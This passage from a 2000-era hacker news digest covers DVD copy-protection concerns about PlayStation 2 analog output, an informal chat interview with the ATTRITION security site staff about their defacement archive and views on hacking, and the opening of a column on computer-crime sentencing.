                  years ago, the consumer electronics, movie, and PC
                  industries all agreed to allow an analog RGB output for
                  PCs, but none for stand-alone DVD players. According
                  to sources working closely with the DVD Forum's
                  Copy Protection Technical Working Group, the three
                  industries reached that compromise because SVGA
                  was the only legacy link available to connect a PC
                  subsystem with an analog PC monitor. If studios ever
                  wanted to let consumers watch DVD movies on a
                  computer, this was the only pathway. 

                  Meanwhile, consumer electronics manufacturers agreed
                  to use composite, component, or S-video -- all
                  protected by using Macrovision technology -- instead
                  of an analog RGB output. 

                  Some observers said the fact that different industries got
                  different treatment from Hollywood could wind up
                  backfiring. Sony Computer Entertainment, in theory,
                  could argue that Playstation 2 is not a stand-alone DVD
                  player, but a computer, experts said. The console
                  doesn't have a DVD decoder chip, but decodes DVD
                  in software. Therefore, it could be argued that
                  Playstation 2 should be permitted an analog RGB
                  output, like any PC on the market, according to this
                  camp. 

                  One Hollywood studio executive, commenting
                  anonymously, said he is not overly concerned with
                  Playstation 2. In his opinion, the picture quality of
                  analog-to-analog copying via analog RGB is too weak
                  to pose a real threat to filmmakers. Others in the movie
                  industry, however, said Sony may have to solve the
                  problem before it introduces the new game console in
                  the United States, where DVD-Video penetration is far
                  more advanced than in Japan. 

                  Also, Hollywood is giving PCs another look as they
                  become capable of receiving HDTV broadcasting. An
                  unprotected analog RGB interface between a computer
                  and a monitor can allow copyrighted material --
                  particularly high-definition signals -- to traverse "in the
                  clear," with no copy protection, becoming a conduit for
                  mass copying. 

                  One studio executive, who spoke on the condition of
                  anonymity, said that new ideas on copy protection for
                  the analog interface are under discussion among PC,
                  consumer electronics, and movie makers. Companies
                  such as Hitachi, Intel, Matsushita, Sony and Toshiba --
                  all with a big stake in the issue -- have been working to
                  find a solution, the executive said. He indicated that an
                  answer might emerge in the next few weeks. 

                  "Although we have not received any technical
                  information about this [Playstation 2] issue yet, if the
                  content is actually being copied from Playstation 2, we
                  need to discuss [matters] with Sony Computer
                  Entertainment to take effective measures," said a
                  spokesman at Sony Picture Entertainment, Tokyo. 
      

      @HWA
            
140.0 HNN:Mar 29th:Interview with Attrition Staff Posted 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by WHiTe VaMPiRe 
      Project Gamma has recently conducted an interview with the ATTRITION
      staff. They detail future plans and speak of how they originally
      started, among other things.
      
      Project Gamma
      
      http://www.projectgamma.com/news/interviews/attrition.shtml
      ----------
      
      sorry about formatting, figured it best left as is. -Ed
      
      ATTRITION


          Date Published: March 27, 2000
          Date Conducted: March 25, 2000
          Interview Conducted By: WHiTe VaMPiRe
          Interview Conducted With: ATTRITION

               ATTRITION is a leading computer security Web site with dedicated staff. They are probably best known for their defaced Web site archive, as they were among the first to mirror defaced Web sites and provide
               them to the public. We came in contact with the ATTRITION staff and asked them about their plans for the future, how they first started, and more. 

               This interview will be left largely unedited due to the nature of the interview and the amount of people involved. This is to make sure that the original intent of their answers is left intact, without distortion of their
               message. Questions will be colored, answers will be indented. 

          The ATTRITION staff consists of: 

               cult_hero aka jericho aka Brian Martin 
               cOmega - Cancer Omega 
               modify 
               punkis 
               McIntyre 
               munge 



          <WHiTe_VaMPiRe> What initially brought about the creation of ATTRITION?

               <cult_hero> A need for change primarily...
               <cult_hero> before attrition was sekurity.org
               <cult_hero> sekurity.org had a great concept, but no focus or direction
               <cult_hero> dropping it was a way of dropping the lack of direction and let us move on
               <cult_hero> attrition wanted to be more to the point
               <cult_hero> more honest, more in your face
               <cult_hero> no sugarcoating on our words
               <cOmega> Definitely in-your-face.
               <cult_hero> no pretty eye candy to obscure information
               <cOmega> Mostly a meat and potatoes site with little to no window dressing.
               <modify> although people still have trouble reading it <grin>
               <cult_hero> heh. BLACK AND RED IS HARD TO READ YO
               <cOmega> Those come from ppl who don't grok client-side configuration.


          <WHiTe_VaMPiRe> Who were the initial people involved with the founding of ATTRITION?

               <cult_hero> correct me if i am wrong..
               <cOmega> Jericho, Punkis, Modify and myself.
               <modify> Meinel, JP, Winn Schwartau, and Atkinson
               <cult_hero> but i thought it was punkis/comega/me on irc discussing it.
               <cOmega> modify: die die die die
               <modify> sorry, had to :)
               <cOmega> cult_hero: yeah, there was a flurry of emails between us, too.
               <cult_hero> maybe mod was there and lurking ;)
               <cult_hero> yes, lots o mail
               <cOmega> cult_hero: most likely. ;-)
               <cult_hero> in the end, it came down to a list of 10 names
               <cult_hero> attrition made the cut


          <WHiTe_VaMPiRe> On that note, what made you go with the name ATTRITION (besides the obvious)?

               <cult_hero> let me ask you...
               <cult_hero> what is the obvious?
               <munge> so the CIA -WAS NOT- involved in the founding of Attrition?
               <cult_hero> no, the NSA
               <cult_hero> oh wait
               <munge> ;)
               <cult_hero> FBI i mean. yeah, we're their front or something.
               <WHiTe_VaMPiRe> Well, the definition, I suppose. As one of you said so appropriately before, "in your face."
               <cOmega> IIRC, Jer wanted something serious. I would have been happy with a "go-pound-sand-up-your-ass-with-a-mallet.org" domain.
               <cult_hero> attrition literally means "confessing for your sins, but not for the love of god"
               <cult_hero> to me that kind of meant confessing for your sins (read: mistakes) because you had a sense of ethics, honor, morality, duty, etc.
               <punkis> not that jer has any of that stuff
               * punkis snickers
               <cOmega> When jer brought the name up, it seemed quite appropriate too, given that the state of security these days is largely a war of attrition.
               <WHiTe_VaMPiRe> Thinking about it, my definition of ATTRITION in my own mind was changed as I became more familiar with your work.
               <cult_hero> vamp: as well as it should...
               <cult_hero> attrition means a lot of things
               <cult_hero> between a print dictionary, classic literature, dictionary.com etc
               * cOmega nods.
               <modify> each viewer interprets and uses the site in their own way
               <cult_hero> because of that, we were able to kind of form our own hybrid definition i think


          <WHiTe_VaMPiRe> How did each of you become involved with ATTRITION?

               <McIntyre> Back in March 1997, I had made a fool of myself with the hacker community.
               <cOmega> I got involved because I enjoyed working with the system and was willing to pitch in when Jer was quite busy.
               <McIntyre> The NCAA Web site was defaced......to make a long story short it was way too easy to track the kiddie down....
               <McIntyre> I had never done it before and made a big media whore of myself....
               <cult_hero> i got involved because i wanted to carry on what i had been doing for five+ years.. with more focus
               <cOmega> Then I started doing more and more stuff...like crashing jer's place about every other weekend.
               <McIntyre> then was outted for the fool I was :)
               <McIntyre> 2 years later....
               <McIntyre> I stumbled across some CPM stuff...was floored...
               <McIntyre> I went to Deja.com
               <McIntyre> searched for her news postings....and found a doozie.
               <munge> i got involved by pitching in on some of the scripting jericho was working on....
               <cult_hero> while comega went to sheep.com
               <cOmega> Another reason why I got so involved with Attrition was because I work for the US government...and they have NO clue about security.
               <cOmega> cult_hero: sheep.gov, mo-ron.
               <cult_hero> munge: some? hah, you did 300% more
               <McIntyre> CPM admitting she took LSD in the 70's when it was medically legal for "brain damage"...her words :)
               <munge> haha cult
               <McIntyre> I passed it onto Jer and that, as they say, is the beginning of a beautiful friendship :)
               <modify> I've known Jericho since 94
               <cOmega> After a long day at the office, coming home to Attrition was a breath of fresh air...validating in its own perverse way.
               <modify> he kicked my teeth in and we have been friends since
               <punkis> I got involved with attrition because jericho liked my cat


          <WHiTe_VaMPiRe> What does ATTRITION mean to each of you personally?


               <cult_hero> sometimes i think i could write a book on just that.
               <punkis> yup
               <punkis> its a love/hate relationship for sure
               <modify> dunno...
               <cOmega> Attrition to me is not only a clearinghouse of valuable information on security, it also contains a load of information as to the consequences of what happens when people don't take security seriously.
               <McIntyre> biting sarcasm, a sharp wit, and forced attrition of those who think they can get away with it
               <cult_hero> there is just so much involved with it... so much going on public and behind the scenes (nothing too exciting mind you, conspiracy theorists of the world k39383)
               <cOmega> We're known largely for our mirror, but that's less than 50% of what we're all about.
               <punkis> plus its a lot more cO
               <punkis> music reviews, sushi reviews, wine reviews
               <cOmega> The mirror shows the consequences; the rest of the Attrition site shows how one can be proactive about security.
               <cOmega> punkis: true.
               <cOmega> and calamari
               <munge> it's about the calamari, dammit
               <cOmega> Calamari is next to godliness.
               <punkis> yes
               <punkis> yes it is
               <modify> To be honest I've found good friends at Attrition.. beyond the obvious I have found family there
               <punkis> and there is a roy's right by work
               <cOmega> punkis: oh yes.
               <modify> Sushi King rules... I'd like to plug them
               <modify> errr... not in that way though
               <modify> :)
               <cOmega> modify: there's a picture I didn't need.
               <cOmega> Basically, we're all a bunch of sick little monkeys who happen to think alike and we share our various passions in life through this 24-hour megaphone of technology known as attrition.org


          <WHiTe_VaMPiRe> What do you have planned for ATTRITION's future?

               <punkis> personally I want to see a technical focus on attrition
               <cult_hero> attritions future. mostly continuing what we have done and making it better. more access to the information, better stats, better cross ref
               <cult_hero> we have been planning a lot more tech areas
               <munge> *nod*
               <cult_hero> which punkis will be heading up soon i think
               <cOmega> punkis: agreed; more of a focus on technical papers and all that good stuff.
               <cult_hero> you can expect to see the return of errata
               <punkis> yes
               <modify> Im thinkin of giving up my Attrition account to join the ranks of the Happy Hacker Grey hat slappy foundation...
               <cOmega> cult_hero: rad.
               <modify> yes, would like to focus more on technical projects

                    <WHiTe_VaMPiRe> Errata, in what sense?

                         <cult_hero> the errata section that deals with shoddy journalism on the net and in print
                         <cult_hero> www.attrition.org/errata/
                         <cOmega> modify: w00t
                         <cult_hero> it actually was one of our earlier widely recognized pages
                         <WHiTe_VaMPiRe> Ah, right. Negation came to mind as part of that.
                         <cult_hero> led to a lot of attention and validation of who we were.
                         <cOmega> God knows there's enough errata out there.
                         <cult_hero> errata linked to negation
                         <cult_hero> yes

                    <WHiTe_VaMPiRe> The technical projects, what do you have planned in that regard?

                         <modify> I would like to see more technical documents and programs released by Attrition and its Staff
                         <punkis> I have some ideas for some security related tools I want to put together
                         <punkis> and a couple of real interesting research ideas
                         <cOmega> I'm working on a full PGP guide that will walk users through the command line and gui versions; installation and usage, as well as caveats.
                         <cOmega> I also have a big-ass proposal I'm working on and will be hopefully releasing under the attrition banner.
                         <cOmega> I'm leaving my government job.


          <WHiTe_VaMPiRe> Are there any common misconceptions behind ATTRITION that you would like to clear up?

               <cult_hero> YES
               <cOmega> YES
               <cult_hero> 1. we are not a company
               <punkis> HELL YES
               <cult_hero> 2. we do not profit from attrition
               <cult_hero> 3. we are not an FBI front
               <cOmega> 1. We are not a Hacker Gang.
               <cOmega> 2. We are not LE.
               <punkis> 4. mcintyr5e is really a woman
               <cult_hero> 4. we are not affiliated with the FBI, CIA, ISA, NSA, DOD, etc
               <modify> 6. We never worked for FEMA
               <cOmega> 3. We are NOT "out to get anyone" - we just tell the truth, unpretty as it is.
               <cult_hero> 5. we are not HFG, ULG, GH, or any other kiddy defacer group
               <munge> but, cult, we do meet in giant bunker shaped like a pentagram
               <cOmega> 4. Punkis is really a man.
               <punkis> 6. Yes, we really do have a helicopter
               <McIntyre> 7. Modify is really a cat.
               <modify> 7. Meinel and JP lie 100% of the time
               <cOmega> 5. We have guns, but we don't have any machine guns.
               <modify> 10. Loop 1
               <cult_hero> 10 goto 1
               <cOmega> 6. We are NOT into vampirism or bloodletting (unless there is sex involved)
               <cult_hero> i do not work for KPMG
               <cult_hero> i was not fired from any security job
               <cult_hero> i am not an fbi informant
               <cOmega> I do work for NASA
               <modify> 11. I need a woman so if any single, attractive women are out there then....
               <cOmega> I am leaving NASA for a better job.
               <cult_hero> attrition has fulfilled 2 federal subpoenas in accordance with US Law
               <cOmega> (I know those fuckwits will lie and say I was 'fired' or some shit.)


          <WHiTe_VaMPiRe> When did ATTRITION initially start the defaced Web site archive?

               <cOmega> Actually, defacement mirroring started before attrition.
               <cOmega> It became "institutionalized" under attrition.
               <cult_hero> comega started it long ago
               <cult_hero> back when it was an uncommon occurrence
               <cOmega> I was doing it way back in the sek.org days.
               <cOmega> I mirrored only sites that I thought were entertaining or elegant in some way.
               <modify> Craig Whitmore started it
               <cOmega> My favorite of all time is "That 0wned Girl".

                    <WHiTe_VaMPiRe> So ATTRITION's mirror was actually a continuation of a project initially started by cOmega?

                         <punkis> yes
                         <cOmega> In a manner of speaking. Jer took the idea and pumped it full of steroids.
                         <cult_hero> yes

               <McIntyre> When I joined up in Feb 1999......I went around to other dead mirrors and asked if we could archive their material
               <cult_hero> 001. comega's mirror of elegant hacks
               <cult_hero> 002. collection of other mirrors
               <cult_hero> 003. start to mirror new sites
               <cult_hero> 004. begin to refine process
               <cult_hero> 005. begin to automate the mirror process
               <cult_hero> 006. revamp the mirror
               <cult_hero> 007. further refine mirror, automation, etc.
               <cOmega> cult_hero: we got to port the mirror into a db.
               <cOmega> mSQL or similar
               <cult_hero> 008. begin to take a more active stance in awareness and statistics
               <cult_hero> that is kind of the progression
               <cult_hero> that is a future goal of the mirror
               <cult_hero> DB it, and make it more searchable
               * cOmega nods.
               <cult_hero> more stats
               <cult_hero> Munge is working on some killer graphical stats pages regarding defacements
               <cult_hero> these will be the kind that make CERT look bad
               <cult_hero> it will put CSI/FBI to shame
               <cult_hero> let me rant a sec
               <cult_hero> one thing we have going for us about the mirror..
               <cult_hero> is that people report the incidents to us
               <cult_hero> not just the hackers
               <cult_hero> but admins sometimes
               <cult_hero> because of this, we can generate a lot more comprehensive stats than the FBI/CERT does
               <cult_hero> because people see reporting to them as a waste of time
               <cult_hero> their lack of response and action discourages further reporting
               <cOmega> The FBI only investigates cases involving mondo $$ or mondo politics.
               <cult_hero> because of this, we hope to take their place in providing realistic statistics regarding computer intrusion
               <modify> One clarification here though everybody
               <modify> and everybody reading this
               <cult_hero> fbi unofficial amount is 5k
               <modify> WE DO NOT HACK THE SITES THAT APPEAR ON THE MIRROR
               <cult_hero> heh
               <punkis> thank you mod
               <cOmega> And our work has one great benefit: we don't do this to pump up our budget or increase revenue (unlike the .com's and .govs)
               <cult_hero> amen
               <cOmega> we do it because we are passionate about it.
               <modify> so stop accusing us ya lackwits
               <cult_hero> and as we have said, we have all turned down consulting work from the mirror
               <cOmega> modify: werd to that.
               <McIntyre> and we continue to do so
               <cult_hero> as much as we hate to do it (and admit it), we've lost some great consulting gigs
               <cult_hero> if we did this for indirect money, i think it would somewhat invalidate our purpose and reason
               <cOmega> Agreed.
               <cOmega> Oh yes, one more thing.
               <modify> yah, but maybe I should get the arts and crafts store to provide financial backing?
               <cOmega> Please ask the kiddies to stop asking us 1. how to hack, or 2. how they can break the law in fucking with their ex or stupid shit like that.


          <WHiTe_VaMPiRe> The next question was, "What is your reasoning behind the defaced Web site archive?" .. but I believe you already answered that.

               <cult_hero> lemme clarify something
               <cult_hero> people like to say that we encourage kids by providing the mirror
               <cult_hero> as punkis always mentions, does this mean the news agencies are guilty of encouraging murder?
               <cult_hero> they write about it, live around it, film it, feed it to the masses
               <cOmega> Like I said earlier, the mirror shows what the consequences are if someone doesn't take security seriously...and website defacements are the LEAST menacing consequence. Consider the intruder who
               alters your data or silently swipes a credit card database (unlike Curador). Now *that* is scary.
               <cult_hero> 1. if we don't do it, someone else will.
               <cult_hero> 2. with us doing it, we think we can do it with a lot of integrity and milk it for valuable info in the form of stats and comparisons
               <McIntyre> So....we might as well do it fully and completely
               <cult_hero> 3. we berate the shit out of the kids reporting these sometimes. we call them lame script kiddies for their actions.
               <cult_hero> 3.5 we do NOT condone their activity any more than shrinks condone the behaviour of their clients
               <cOmega> no doubt


          <WHiTe_VaMPiRe> What are your personal feelings on Web site defacements?

               <cOmega> Lame.
               <punkis> I think they are fucking lame
               <modify> stupid
               <punkis> such as is tagging
               <cOmega> There is no elegance in it these days.
               <modify> no purpose
               <punkis> same thing
               <cOmega> Just greets and swearing.
               <cult_hero> 99.9% are a waste of time, talent, and purpose
               <punkis> 99.9% require no talent
               <cult_hero> nod
               <modify> any reason to hack amnesty international?
               <cOmega> At least the "That 0wned Girl" defacement was funny.
               <modify> no
               <McIntyre> At least those done for hacktivism had a reason.....
               <modify> yah, that rooled
               <munge> who reads the mirror archive just to see the defacements anymore? not me. 'nuff said.
               <cOmega> Some other hacks that I mirrored early on were funny as hell.
               <cult_hero> if we don't mirror them, they will continue to happen tho
               <punkis> and when they defaced KKK it was fucking stupid....no message
               <cult_hero> the URLs will be passed around IRC and mail lists
               <McIntyre> I've seen maybe 5-6 good ones since I started last February.....
               <McIntyre> 1999
               <WHiTe_VaMPiRe> 'Hacktivism' these days is a shroud / justification for lacking actions, quite frequently, from what I have seen.
               <cult_hero> so we mirror them despite their lame message
               <munge> *nod*
               <McIntyre> all the rest are just plain wasteful.
               <punkis> hacktivism is a myth
               <modify> its a freakin excuse
               <cOmega> WHiTe_VaMPiRe: Given what I've seen, hacktivism is a myth.
               <modify> lets face it
               * cOmega hi5's punkis.
               <McIntyre> Don't fucking hack a site because you can.
               <cult_hero> i think i have found a way to identify hacktivism. no signature. if you are hacking for a reason, there is no need to put a name, group name, or greets.
               <cOmega> It's like this: if you have a beef with, say, Big Oil, would you picket a Mom & Pop dime store?
               <cult_hero> those that do so are using it as a justification, not for pure hacktivism
               <cOmega> That's what these kiddies are doing when they hit 'smalltime.com' and bitch about 'big government'.
               <modify> I hacked it for freedom of speech or freedom of information is a crock of shit too... 
               <McIntyre> cOmega...exactly.
               <cult_hero> like the Japanese servers defaced today to rant (in english) about Pakistan/Indian issues
               <McIntyre> If you have a message. Deface a site that has something to do with that message (not that we condone it...)
               <cOmega> It's like when H4G1S hit NASA HQ.
               <cOmega> They bitched about commercialization of the Internet.
               <cOmega> Uhhh...DUH? Then why not hit a .com, ya stupid fucks?
               <munge> if hackers want to have an impact, then they should donate their time and skills to causes they believe in. 



          <WHiTe_VaMPiRe> From what you have seen, what are the common motives for Web site defacement?

               <McIntyre> 1. Because they can
               <cOmega> WHiTe_VaMPiRe: juvenile angst.
               <cult_hero> motive is because they can
               <punkis> yes I agree with mcintyre
               <McIntyre> 2. To make fun of another group/rile them up
               <cult_hero> and because they think 'hacking' is sexy
               <McIntyre> 3. to test their skills
               <cult_hero> "everyone else does, it must be what hacking is about, so i will do it so i can be a hacker"
               <McIntyre> 4. to show off
               <cult_hero> circular logic
               <cOmega> WHiTe_VaMPiRe: why do young kids go hot rodding? It's a rush and it makes them feel big.
               <punkis> defacing a web site != hacking
               <munge> donate time to green peace, something like that. don't deface a corporate website
               <cOmega> punkis: word.
               <modify> stop at #1 and loop
               <munge> *nod* punkis
               <McIntyre> 5. to get their message out regardless of what site they deface
               <cOmega> Doing a ./latest-sploit.sh != hacking
               <cOmega> And the only thing lamer than defacements is DoS'ing.
               <McIntyre> 6. being the first to deface a new country....
               <McIntyre> 7. being the first to deface an new OS
               <McIntyre> (ie Win2k)
               <modify> yah, and running UNIX exploits against an NT server isn't gonna work... thats TIP #1
               <cult_hero> defacing a "secure" company
               <cOmega> hahahha
               <punkis> and iishack is not effective against apache
               <munge> haha
               <modify> lol
               <cult_hero> or the morons who tried to hit us with IIS exploits the other night
               <WHiTe_VaMPiRe> hahah
               <WHiTe_VaMPiRe> Nice.
               <McIntyre> I bet it won't be long before someone tries to deface a Palestine site (.ps) when they go live.
               <cOmega> Remind me to show you my logs at work sometime. Not a lot of brain thrust out there.


          <WHiTe_VaMPiRe> Do you feel that there is any valid motive for defacing a Web site?

               <cult_hero> good question
               <cult_hero> valid MOTIVE? sure
               <cult_hero> strictly speaking of motives, i think so
               <WHiTe_VaMPiRe> valid reasoning, I should say..
               <modify> women only.. just do it for women
               <cult_hero> true hacktivism. david vs goliath (angry consumer vs large corp)
               <punkis> its just a shame no valid motives are ever demonstrated
               <modify> like Zyklon
               <cult_hero> exactly
               <cult_hero> mod: that is called obsessive stalking i think
               <punkis> like I said, KKK was defaced, which I have no problem with, but there was no message
               <modify> whats wrong with that
               <modify> ?
               <cOmega> I can see doing it as a prank between friends, but as an actual intrusion with intent to damage someone else's property, I couldn't go with that. Minor exceptions would be made for hate groups and/or
               pedophiles.
               <cOmega> But that's on principle alone.
               <cOmega> I think defacements generally denigrate the intent of doing good.
               <punkis> especially when these fuckwits are defacing schools that really have no admin/security personnel to speak of
               <punkis> they are helpless
               <munge> i could see doing it in a completely oppressive society, with no outlet for free speech, against that oppressive gov't
               <modify> nod, like k12 doms
               <modify> WE DO NOT ENDORSE DEFACEMENT OF SITES... WE JUST ARCHIVE!!!
               <modify> message #2
               <cult_hero> </disclaimer>
               <modify> sorry just clearing up FAQ's


          <WHiTe_VaMPiRe> Do you have any comments on the legal implications of computer crime?

               <cOmega> WHiTe_VaMPiRe: legal implications?
               <cult_hero> can you be more detailed?
               <cOmega> explain.

               <WHiTe_VaMPiRe> The current law enforcement response to say, Web site defacement, and other forms of computer crime that are starting to become more prominent.

               <cOmega> I personally believe the idea of increasing penalties for hacking is utterly wrong-headed.
               <cult_hero> another book in the making
               <punkis> yes
               <munge> cOmega: *agreed*
               <cOmega> Security is not rocket science.
               <modify> Poor admins are too easy to point fingers..
               <cOmega> If the government would focus more on the ounce of prevention rather than the pound of cure, we would have 1/10th of 1% of the number of intrusions we have today.
               <modify> ITS YOUR JOB@!!!!
               <modify> stop surfing porn
               <cOmega> modify: right on.
               <munge> haha maud
               <cult_hero> As my mother said, it is a knee-jerk reaction you find made by law enforcement to ANY 'new' type of crime
               <punkis> well put
               <cOmega> the media doesn't help matters, either.
               <cOmega> it puts forth the proposition that these scriptkiddies are 'geniuses' because it's a sexy story.
               <punkis> the media is the driving force behind the governments reaction
               <cOmega> it's not sexy enough to say that the admins are lazy bums and that everyone and their brother who had a clue knew about the vulnerability 2 years ago.

                    <WHiTe_VaMPiRe> What response do you feel would be most appropriate from law enforcement?

                         <cOmega> I expect nothing appropriate from law enforcement.
                         <cult_hero> "you were broken into because you are stupid. secure your machines"
                         <cOmega> The legislature is the only branch that can change it.
                         <McIntyre> Taking the time to learn the technology they're dealing with
                         <modify> Kick every door in until you find the culprit :)
                         <McIntyre> rather than working against it
                         <cOmega> LE is just a group of droids who follow orders.
                         <cult_hero> i think most web site investigations are a waste of tax payer money
                         <punkis> like mod said, so your fucking job
                         <cOmega> cult_hero: agreed++
                         <punkis> s/so/do
                         <modify> Admins need to take more time to look at the security of their network
                         <modify> its not freakin hard
                         <punkis> some of the mail we get from clueless admins really floors me

                    <WHiTe_VaMPiRe> As more laws are being passed as of late, and others trying to be passed, what do you think is the best response? More laws, less laws? What type of laws? What do you feel the
                    overall best response to computer crime and punishment would be?

                         <cult_hero> The same laws. The laws are NOT the problem.
                         <cOmega> WHiTe_VaMPiRe: I'll tell you this: out of 2,000 admins at one NASA center, I can count on one hand the number who actually understand how to lock down a server. And
                         people wonder why NASA gets breached so often!
                         <modify> Security awareness... 
                         <cult_hero> I think the FBI need to stand back and qualify what is worth investigating.
                         <cOmega> WHiTe_VaMPiRe: I think the next law that gets passed should be one that sets a mandatory limit on what qualifies someone to be an admin.
                         <punkis> a large media response is not a good justification for an investigation
                         <cult_hero> They are being jerked in every direction by bureaucracy, charlatan consultants claiming to have miracle solutions, media pressure, and more
                         <cult_hero> how can they be expected to do a good job when they have no understanding of the security arena?
                         <cOmega> The proposal I'm working on should eradicate a lot of charlatans and snakeoil in the industry.
                         <modify> I love the admins that throw up a NT server and leave it... kinda like leaving your car running while going to the store
                         <McIntyre> Why concentrate on a Web defacement where nothing was deleted, yet ignore the constant intrusions into gov servers by machines in foreign countries
                         <cult_hero> Think the FBi would have busted Curador had there been no media attention?
                         <cult_hero> hell no.
                         <cOmega> cult_hero: curador also wiggled his ass at them, which was not a bright thing to do.
                         <cOmega> curador bragged too much.
                         <cult_hero> without the media attention, they never would have seen such ass wiggling
                         <punkis> heh
                         <cOmega> true
                         <McIntyre> Although, I have to admit....there was less attention on Curador than there was with Max Stone and the DDoSers
                         <cOmega> What got Curador was that he used the stuff he stole.
                         <cOmega> Which was not too terribly bright.
                         <modify> oh.. new buzzword bingo will be "Zombie Attacks" look for it at a theatre near you!
                         <cult_hero> fraud bumped it into a new level of crime
                         <McIntyre> that and he kept moving from place to place leaving a new trail to add to the investigation each time.
                         <cOmega> I think the other half of that criminal investigation should be the sites that left CC data on the server unencrypted.
                         <cult_hero> all free servers, which log heavily
                         <cOmega> I'd like to stay with that for a moment.
                         <cOmega> You see, a lot of our rights are under attack by our own government.
                         <cOmega> Our right to explore (ala restrictions on reverse engineering)
                         <cOmega> Our right to possess firearms
                         <cOmega> Our right against unreasonable search and seizure (see the drug laws)
                         <cOmega> Did you know that if you carry around more than 500 dollars on your person and a cop sees it, that money can be legally taken from you WITHOUT your being arrested or
                         charged??
                         <cOmega> And you have to PROVE you have it legally.
                         <cOmega> I kid you not.
                         <cOmega> It's part of the zero tolerance anti-drug laws.
                         <cOmega> look it up.
                         <cOmega> I -- right now -- am a Fourth Amendment nightmare waiting to happen.
                         <cOmega> I plan to rant on it via attrition in the future.
                         <cOmega> Guns are my primary passion. To me, the 2nd Amendment is as crucial as the First Amendment (which is what Attrition is all about).


          <WHiTe_VaMPiRe> As the defaced Web site archive seems to be the area most focused on within ATTRITION these days, what section do you feel is most overlooked, or does not get as much attention as it deserves?

               <munge> calamari
               <cult_hero> errata and our various tech areas
               <McIntyre> vulnerabilities
               <cult_hero> staff.html ;)
               <modify> Newbie
               <punkis> haha
               <cOmega> Firearms.
               <munge> more seriously, 1. the stats


          <WHiTe_VaMPiRe> I cannot end this interview without asking this thought-provoking and vital question running through everyone's mind... do you guys like Ramen (noodles)?

               <McIntyre> Always room for Ramen
               <cult_hero> i dig ramen.
               <modify> with butter
               <cult_hero> not as much as calamari, sushi or mississippi mud tho
               <munge> Ramen: Yes.
               <cOmega> I don't eat Ramen...but Satrina does. I eat Popcorn.
               <modify> sushi
               <cOmega> Filet Mignon.
               <munge> yes, sushi is the best
               <cult_hero> hmmm
               <modify> sushi
               <cult_hero> enough of that
               <cOmega> hehehe
               <McIntyre> Whiskey Sours, Mudslides, General Gau Chicken, and Nigiri
               <modify> there is this place Sushi King


          <WHiTe_VaMPiRe> Okay, okay, what 'geek' does not like Ramen? Answer this, what kind of Ramen do you prefer?

               <cOmega> COFFEE.
               <modify> it's a great place for the gender benders
               <modify> like jericho
               <cult_hero> I dig the Cup o Soup honestly. 
               <munge> i like the chili ramen :)
               <cOmega> I eat Habanero chilis and popcorn. I was born before Ramen came into existence.


          <WHiTe_VaMPiRe> Anything you would like to discuss or any closing comments before we end this interview?

               <cOmega> One thing I'd like to add.
               <cult_hero> if something isn't covered here...
               <cult_hero> just mail and ask
               <WHiTe_VaMPiRe> Okay, will do.
               <WHiTe_VaMPiRe> Thanks a lot for the time.
               <cOmega> We are a proactive group. We are also very *pro* on things like accuracy, truth and fairness.
               <cult_hero> not just you vamp, all the interview readers too.
               <cOmega> This does not mean we are against anyone.
               <cOmega> We are only against those people who do not practice accuracy, truth or fairness.
               <cOmega> It's a matter of principles, not personalities.
               <cOmega> And don't let anyone tell you different.



          ATTRITION is reachable at http://www.attrition.org/. You can find more information about the staff on this Web page or mail them.       

      @HWA
            
141.0 HNN:Mar 29th:The Unfairness of Computer Crime Sentences 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      
      contributed by Agrajag 
      Are the punishments given to those who commit relatively minor
      computer-related crimes, such as web page defacements, unfair? Rather
      than being treated like their real-world counterparts (e.g. trespass
      and spray-painting graffiti) and earning the fairly minor sentences
      that fit the actual crimes, they are most often treated as serious
      felonies deserving of overly harsh punishments, which are completely
      out of line with the crimes committed and seemingly handed down only
      because a computer was involved.
      
      Linux World
      
      http://www.linuxworld.com/linuxworld/lw-2000-03/lw-03-devnul_3.html
      ----------
      
      A matter of degrees: Let the punishment fit the crime.
       
      
          Summary: When Attorney General Janet Reno's report, "The Electronic 
          Frontier: The Challenge of Unlawful Conduct on the Internet," was 
          published earlier this month, it drew the conclusion that "existing 
          federal law is generally adequate to cover unlawful conduct involving 
          the use of the Internet." J.S. Kelly rather vehemently disagrees with 
          that finding. (2,000 words) 

     By J.S. Kelly 



         The US attorney general's report, entitled "The Electronic Frontier: The 
         Challenge of Unlawful Conduct on the Internet," repeatedly emphasized a 
         need to treat unlawful conduct online the same as it is treated 
         offline. 

     At least two glaring examples of how cyber issues are handled differently 
     than their counterpart issues in the non-Internet world were not included 
     in the report. One of those issues is that car manufacturers, unlike 
     software companies, are held liable for selling products they know are 
     defective. I'd like to address that well known shortcoming in a future 
     column, devoting this one to an issue that's even more important. 

     Free Coolio

     In the first week of March, at about the same time the report was 
     published, news sources reported that a 17-year-old New Hampshire kid, 
     who goes by the online name Coolio, had been detained as a suspect in a 
     hacking case. 

     The teen told reporters that he had defaced three Web sites, of which two 
     were US government sites. But they weren't exactly the equivalent of the 
     Pentagon -- D.A.R.E. is the Los Angeles Police Department's antidrug 
     Website for kids, and the CWC is the relatively unknown and unimportant 
     Chemical Weapons Convention Webpage. The site hosts informational texts 
     relating to the CWC, a global treaty that bans chemical weapons. 

     The third supposed hack (a hijacking, actually) attributed to Coolio is 
     that of RSA, a commercial computer security company. 

     Website defacement is being described by US authorities as felony 
     vandalism, while in Canada the same phenomenon seems to be called malicious 
     mischief to data. 

     Let he who is without youthful indiscretions cast the first stone

     The media, with visions of Pulitzer prizes dancing in their heads, have 
     pursued this story with due diligence and vigor. 

     News reports described the teen in ominous tones, as "a high school 
     dropout" who "regularly gets high on cough syrup," who is supposedly 
     emotionally unstable because he is liable to fly off the handle when 
     criticized, and whose room is "almost too messy to enter." 

     Give me a break -- the kid is 17 years old. If they'd found a 17-year-old 
     with a really neat room, who was ostensibly not prey to the emotional ups 
     and downs usually associated with adolescence, then I might be a little 
     more worried. I'd prefer that he experimented with cough syrup and 
     mouthwash than with heroin. And he was not a dropout: he left school early 
     and got his GED. 

     Now, you might argue that to break into computers and to deface US 
     government Websites is, well, kind of dumb. I don't disagree. But 
     adolescence is dumb, too. 

     Adolescence is all about testing limits, standing up to authority (and 
     rejecting it) and generally behaving like an idiot. It's also about 
